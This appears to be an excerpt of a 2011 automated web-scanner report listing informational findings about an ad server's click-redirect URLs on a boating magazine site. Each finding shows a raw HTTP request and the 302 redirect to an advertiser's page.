Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:28:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1601012463/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1601012463/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1601012463/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.245. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1603321405/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1603321405/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1603321405/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1603321405/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1608053131/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1608053131/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1608053131/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609075181/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609075181/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609075181/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.248. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:00:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1610500850/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1610500850/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1610500850/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616153881/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616153881/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.flashedition.com/publication?i=59172

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616153881/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616398296/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616398296/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616398296/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:15:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1643229148/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1643229148/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1643229148/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:39:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:01:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1657104294/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1657104294/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1657104294/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663724185/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663724185/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663724185/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1667705661/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1667705661/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1667705661/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

